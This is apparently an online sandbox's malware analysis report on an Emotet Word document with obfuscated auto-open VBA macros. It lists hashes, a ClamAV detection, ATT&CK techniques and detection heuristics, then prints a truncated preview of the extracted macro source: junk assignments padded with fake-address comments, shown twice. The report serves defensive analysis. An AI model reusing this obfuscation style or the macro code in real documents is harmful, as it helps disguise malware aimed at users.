Emotet Office (OLE) malware analysis — malicious · 5ada1f249afb0dab

MALICIOUS

Office (OLE)

307.5 KB Created: 2019-10-11 17:58:00 Authoring application: Microsoft Office Word First seen: 2020-01-07

MD5: b04482c6eb9a16dba1e8069925224fd5 SHA-1: d9ac1b040c0b91000e9293658f90349a36eda2df SHA-256: 5ada1f249afb0dab78e36e9ef60a134dd593275d1f25d51ce200eb0073a168a9

282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-7330698-0'. Static analysis reveals the presence of heavily obfuscated VBA macros, including an auto-executing 'autoopen' macro that utilizes GetObject and Shell execution. These characteristics are strongly indicative of the Emotet family, which commonly uses macro-enabled documents to download and execute further stages.

Heuristics 8

ClamAV: Doc.Downloader.Emotet-7330698-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7330698-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 245232 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	245232 bytes
SHA-256: `8eabe5973b9a2f7d9ef54d144bb7ce906481af5fa3304b2d56e5e14c0aa4389c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "c9007605070" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "x2501703442, 0, 0, MSForms, TextBox" Attribute VB_Control = "b80990202043, 1, 1, MSForms, TextBox" Attribute VB_Control = "b0410cc300910, 2, 2, MSForms, TextBox" Attribute VB_Control = "bx7483xbx41, 3, 3, MSForms, TextBox" Attribute VB_Control = "x56513bc3xb9x, 4, 4, MSForms, TextBox" Attribute VB_Control = "x1b39xb450cc0, 5, 5, MSForms, TextBox" Attribute VB_Name = "b000038020068" Function bb80463c445() On Error Resume Next 'Corporate17784 Hilpert Lock, South Onie, Guernsey Corporate793 Runolfsson Hills, Lorainetown, Finland c993170005c4 = Rnd(c945104085b9 * ChrB(778)) + Log(198) 'Customer3768 Davis Fields, East Fordport, Saint Martin Human57074 Rogahn Forest, South Viola, United States Minor Outlying Islands b500310460017 = Rnd(b4161bbb70xc0 * ChrB(904)) + Log(298) 'Chief4803 Dickens Manor, New Kevin, Romania Legacy8682 Wolff Cliffs, North Jevonborough, South Georgia and the South Sandwich Islands x51b5382xx9 = Rnd(b5x3301b0cc * ChrB(397)) + Log(374) 'Legacy574 O'Hara Valleys, East Ima, Morocco Chief2106 Wiegand Burgs, Port Ambrose, Ghana b1b3b03275x = Rnd(b0b166006b08 * ChrB(487)) + Log(443) 'Internal035 Wendell Creek, Port Teresa, Slovakia (Slovak Republic) Future264 Mauricio Points, Kemmerton, Republic of Korea cc32x41x51800 = Rnd(c000964088803 * ChrB(170)) + Log(87) 'Lead656 Jalen Trail, Madelynville, French Southern Territories Product0203 Sporer Shoal, East Noreneberg, Saint Kitts and Nevis x9206c2c0b4 = Rnd(c6780x7c00b4 * ChrB(176)) + Log(363) 'Dynamic03650 Ari Mission, Haleyberg, Mongolia Corporate05160 Enos Rue, North Dwightmouth, Tajikistan c8350140080 = Rnd(c0x03xxbcxxc3 * ChrB(254)) + Log(570) 'International207 Gleason Mews, East Theoborough, Solomon Islands Legacy83905 Clarabelle Terrace, Beattychester, Antarctica (the territory South of 60 deg S) 'Future34236 Lucas Heights, East Lambertton, Mauritius Corporate50793 Harber Flats, Rileybury, Kuwait b0c5xx7687520 = Rnd(c8420300045b * ChrB(609)) + Log(489) 'District87442 Corwin Causeway, Brandonport, Suriname Dynamic777 Guadalupe Neck, South Albertbury, Niger x37053b6539b = Rnd(x00xb7b30x37 * ChrB(802)) + Log(502) 'Lead4109 Stehr Flats, Faemouth, Singapore Global3583 Kirsten Trace, Wardchester, Sao Tome and Principe bb70b03202685 = Rnd(x69b4007400 * ChrB(843)) + Log(845) 'Regional4768 Haylie Centers, East Gertrude, Macedonia Legacy265 Zora Village, South Kaelynborough, Kiribati b6707cc400x2x = Rnd(b55c8c95753b4 * ChrB(63)) + Log(681) 'Legacy753 Lindgren Ranch, Port Jayda, Georgia Legacy8804 Eldora Manor, Wardmouth, Maldives cc539388x32 = Rnd(c90300x0600 * ChrB(344)) + Log(296) 'Legacy0039 Tillman Shoal, Lake Melany, Saint Helena Corporate4199 Joshuah Point, North Jordonfurt, Rwanda xx41x9070008b = Rnd(c40445908xc45 * ChrB(48)) + Log(352) 'Forward588 Connelly Burgs, Lake Edwardochester, Belgium International4974 Bednar Point, North Kevintown, Mauritania b87028102708 = Rnd(c804ccb04433b * ChrB(82)) + Log(272) 'District93957 Edward Overpass, Olenmouth, Belarus Forward624 Darwin Dale, West Rodgerville, Monaco 'International2594 Fisher Lodge, Montyview, Myanmar Dynamic67348 Jakubowski Road, Lake Juwan, Saint Vincent and the Grenadines b05b274b191 = Rnd(b722xx652x16 * ChrB(896)) + Log(19) 'National420 Rutherford Forge, Berneicehaven, Faroe Islands District0196 Quitzon Wells, South Verna, United Arab Emirates x3cc80001937 = Rnd(b092b7330b1x5 * ChrB(159)) + Log(386) 'Legacy754 Nader Rest, Wolffurt, Guernsey International33092 Elena Terrace, Riverview, Niue c1691c9b776 = Rnd(b60400x33050b * ChrB(323)) + Log(390) 'Regional72264 Rasheed Groves, South Shawnafort, Saint Kitts and Nevis Global5166 Alanna Villages, Ninaton, Kiribati x073b7560007 = Rnd(x970801c0b890 * ChrB(706)) + Log(88) 'Corporate5 ... (truncated)

SHA-256: 8eabe5973b9a2f7d9ef54d144bb7ce906481af5fa3304b2d56e5e14c0aa4389c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "c9007605070"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "x2501703442, 0, 0, MSForms, TextBox"
Attribute VB_Control = "b80990202043, 1, 1, MSForms, TextBox"
Attribute VB_Control = "b0410cc300910, 2, 2, MSForms, TextBox"
Attribute VB_Control = "bx7483xbx41, 3, 3, MSForms, TextBox"
Attribute VB_Control = "x56513bc3xb9x, 4, 4, MSForms, TextBox"
Attribute VB_Control = "x1b39xb450cc0, 5, 5, MSForms, TextBox"

Attribute VB_Name = "b000038020068"
Function bb80463c445()
On Error Resume Next
   'Corporate17784 Hilpert Lock, South Onie, Guernsey Corporate793 Runolfsson Hills, Lorainetown, Finland
c993170005c4 = Rnd(c945104085b9 * ChrB(778)) + Log(198)
'Customer3768 Davis Fields, East Fordport, Saint Martin Human57074 Rogahn Forest, South Viola, United States Minor Outlying Islands
b500310460017 = Rnd(b4161bbb70xc0 * ChrB(904)) + Log(298)
'Chief4803 Dickens Manor, New Kevin, Romania Legacy8682 Wolff Cliffs, North Jevonborough, South Georgia and the South Sandwich Islands
x51b5382xx9 = Rnd(b5x3301b0cc * ChrB(397)) + Log(374)
'Legacy574 O'Hara Valleys, East Ima, Morocco Chief2106 Wiegand Burgs, Port Ambrose, Ghana
b1b3b03275x = Rnd(b0b166006b08 * ChrB(487)) + Log(443)
'Internal035 Wendell Creek, Port Teresa, Slovakia (Slovak Republic) Future264 Mauricio Points, Kemmerton, Republic of Korea
cc32x41x51800 = Rnd(c000964088803 * ChrB(170)) + Log(87)
'Lead656 Jalen Trail, Madelynville, French Southern Territories Product0203 Sporer Shoal, East Noreneberg, Saint Kitts and Nevis
x9206c2c0b4 = Rnd(c6780x7c00b4 * ChrB(176)) + Log(363)
'Dynamic03650 Ari Mission, Haleyberg, Mongolia Corporate05160 Enos Rue, North Dwightmouth, Tajikistan
c8350140080 = Rnd(c0x03xxbcxxc3 * ChrB(254)) + Log(570)
'International207 Gleason Mews, East Theoborough, Solomon Islands Legacy83905 Clarabelle Terrace, Beattychester, Antarctica (the territory South of 60 deg S)
'Future34236 Lucas Heights, East Lambertton, Mauritius Corporate50793 Harber Flats, Rileybury, Kuwait
b0c5xx7687520 = Rnd(c8420300045b * ChrB(609)) + Log(489)
'District87442 Corwin Causeway, Brandonport, Suriname Dynamic777 Guadalupe Neck, South Albertbury, Niger
x37053b6539b = Rnd(x00xb7b30x37 * ChrB(802)) + Log(502)
'Lead4109 Stehr Flats, Faemouth, Singapore Global3583 Kirsten Trace, Wardchester, Sao Tome and Principe
bb70b03202685 = Rnd(x69b4007400 * ChrB(843)) + Log(845)
'Regional4768 Haylie Centers, East Gertrude, Macedonia Legacy265 Zora Village, South Kaelynborough, Kiribati
b6707cc400x2x = Rnd(b55c8c95753b4 * ChrB(63)) + Log(681)
'Legacy753 Lindgren Ranch, Port Jayda, Georgia Legacy8804 Eldora Manor, Wardmouth, Maldives
cc539388x32 = Rnd(c90300x0600 * ChrB(344)) + Log(296)
'Legacy0039 Tillman Shoal, Lake Melany, Saint Helena Corporate4199 Joshuah Point, North Jordonfurt, Rwanda
xx41x9070008b = Rnd(c40445908xc45 * ChrB(48)) + Log(352)
'Forward588 Connelly Burgs, Lake Edwardochester, Belgium International4974 Bednar Point, North Kevintown, Mauritania
b87028102708 = Rnd(c804ccb04433b * ChrB(82)) + Log(272)
'District93957 Edward Overpass, Olenmouth, Belarus Forward624 Darwin Dale, West Rodgerville, Monaco
   'International2594 Fisher Lodge, Montyview, Myanmar Dynamic67348 Jakubowski Road, Lake Juwan, Saint Vincent and the Grenadines
b05b274b191 = Rnd(b722xx652x16 * ChrB(896)) + Log(19)
'National420 Rutherford Forge, Berneicehaven, Faroe Islands District0196 Quitzon Wells, South Verna, United Arab Emirates
x3cc80001937 = Rnd(b092b7330b1x5 * ChrB(159)) + Log(386)
'Legacy754 Nader Rest, Wolffurt, Guernsey International33092 Elena Terrace, Riverview, Niue
c1691c9b776 = Rnd(b60400x33050b * ChrB(323)) + Log(390)
'Regional72264 Rasheed Groves, South Shawnafort, Saint Kitts and Nevis Global5166 Alanna Villages, Ninaton, Kiribati
x073b7560007 = Rnd(x970801c0b890 * ChrB(706)) + Log(88)
'Corporate5
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.